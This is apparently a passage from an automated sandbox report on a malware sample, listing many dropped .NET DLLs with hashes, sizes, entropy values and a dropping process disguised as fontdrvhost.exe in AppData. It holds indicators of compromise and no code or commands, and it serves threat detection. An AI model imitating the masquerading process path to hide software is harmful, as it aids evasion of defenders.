                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):294912
                                                                  Entropy (8bit):6.010605469502259
                                                                  Encrypted:false
                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
